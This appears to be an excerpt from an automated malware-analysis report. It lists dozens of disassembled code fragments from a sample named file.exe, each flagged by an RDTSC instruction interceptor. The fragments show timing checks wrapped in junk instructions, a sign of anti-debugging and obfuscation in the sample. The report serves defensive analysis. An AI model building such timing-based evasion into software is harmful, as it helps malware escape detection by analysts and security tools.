Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FAB3 second address: A1FAD8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAA4EF80C6h 0x00000008 jmp 00007FFAA4EF80D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC19 second address: A1FC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC1D second address: A1FC3B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FFAA4EF80CCh 0x00000010 jp 00007FFAA4EF80C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007FFAA4EF80C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC3B second address: A1FC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FFAA4B0AF21h 0x0000000e jl 00007FFAA4B0AF16h 0x00000014 pop ebx 0x00000015 popad 0x00000016 jc 00007FFAA4B0AF22h 0x0000001c jp 00007FFAA4B0AF1Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FD8B second address: A1FDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FDAB second address: A1FDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF20h 0x00000009 jmp 00007FFAA4B0AF24h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AAB second address: A22AE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FFAA4EF80D3h 0x00000008 jnp 00007FFAA4EF80C6h 0x0000000e pop ebx 0x0000000f jmp 00007FFAA4EF80D7h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AE7 second address: A22AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AFF second address: A22B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FFAA4EF80C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24D33 second address: A24D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24D37 second address: A24D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A280DA second address: A280DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A280DE second address: A280E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D07C second address: A2D082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D082 second address: A2D086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D086 second address: A2D0A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAA4B0AF1Dh 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D0A2 second address: A2D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4EF80D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D0C1 second address: A2D0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAA4B0AF23h 0x00000008 jmp 00007FFAA4B0AF1Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C698 second address: A2C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFAA4EF80C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C980 second address: A2C99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAA4B0AF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C99E second address: A2C9AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAA4EF80C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32830 second address: A3284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF29h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3284F second address: A3287D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CEh 0x00000007 jmp 00007FFAA4EF80D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3287D second address: A32892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32892 second address: A328B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FFAA4EF80D9h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A329F4 second address: A329FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A329FF second address: A32A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B85 second address: A32B8A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B8A second address: A32B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B95 second address: A32B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32E24 second address: A32E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32E2A second address: A32E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330AD second address: A330D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFAA4EF80D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330D1 second address: A330F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007FFAA4B0AF16h 0x00000012 jg 00007FFAA4B0AF16h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330F0 second address: A330F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A18 second address: A33A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38194 second address: A3819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DC83 second address: A3DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DC87 second address: A3DCA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DCA0 second address: A3DCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DE1A second address: A3DE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DE1E second address: A3DE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF99 second address: A3DFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D7h 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007FFAA4EF80C6h 0x00000011 jmp 00007FFAA4EF80CAh 0x00000016 popad 0x00000017 jo 00007FFAA4EF80CEh 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA8E second address: A3EA94 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA94 second address: A3EAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FFAA4EF80CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F666 second address: A3F66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F66A second address: A3F66E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F66E second address: A3F674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A44151 second address: A44157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A49184 second address: A491A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A522B3 second address: A522CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 996A05 second address: 996A1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAA4B0AF22h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 996A1D second address: 996A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50570 second address: A50578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50578 second address: A5057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5057E second address: A50582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5088F second address: A508A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50B77 second address: A50B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50F90 second address: A50FA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAA4EF80CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50FA4 second address: A50FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510B6 second address: A510BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510BC second address: A510C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510C2 second address: A51108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4EF80D1h 0x00000010 jbe 00007FFAA4EF80DFh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A51287 second address: A512B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 jmp 00007FFAA4B0AF27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FFAA4B0AF16h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512B9 second address: A512C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FFAA4EF80C6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512C7 second address: A512D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512D9 second address: A512DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A52116 second address: A52123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FFAA4B0AF27h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A52123 second address: A52144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 jmp 00007FFAA4EF80CDh 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4FF00 second address: A4FF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A58DE4 second address: A58E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAA4EF80D3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A589D2 second address: A589D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5D7 second address: A5A5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5DB second address: A5A5E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAA4B0AF16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5E7 second address: A5A5F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A417 second address: A5A42B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAA4B0AF16h 0x00000008 jg 00007FFAA4B0AF16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A42B second address: A5A42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A42F second address: A5A435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BC7 second address: A69BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69733 second address: A6975A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FFAA4B0AF16h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73C25 second address: A73C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFAA4EF80D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994F99 second address: 994F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E0E9 second address: A7E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FFAA4EF80D0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FFAA4EF80C6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E10A second address: A7E138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF22h 0x00000007 jmp 00007FFAA4B0AF25h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7DF8E second address: A7DF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87DAD second address: A87DBC instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86636 second address: A8663B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8663B second address: A8666D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Dh 0x00000009 jmp 00007FFAA4B0AF22h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAA4B0AF1Ah 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A867CE second address: A867EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A867EE second address: A8683F instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4B0AF28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FFAA4B0AF20h 0x0000000f je 00007FFAA4B0AF1Eh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007FFAA4B0AF27h 0x0000001f js 00007FFAA4B0AF22h 0x00000025 ja 00007FFAA4B0AF16h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8683F second address: A86843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86843 second address: A8684B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8684B second address: A8684F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86AFB second address: A86B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF29h 0x00000009 jmp 00007FFAA4B0AF1Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86C5E second address: A86C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86DDA second address: A86E10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF27h 0x00000007 jmp 00007FFAA4B0AF27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87AB9 second address: A87ACD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAA4EF80CBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87ACD second address: A87AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFAA4B0AF16h 0x00000009 jl 00007FFAA4B0AF16h 0x0000000f jmp 00007FFAA4B0AF21h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B84D second address: A8B855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B855 second address: A8B86F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF26h 0x00000009 rdtsc
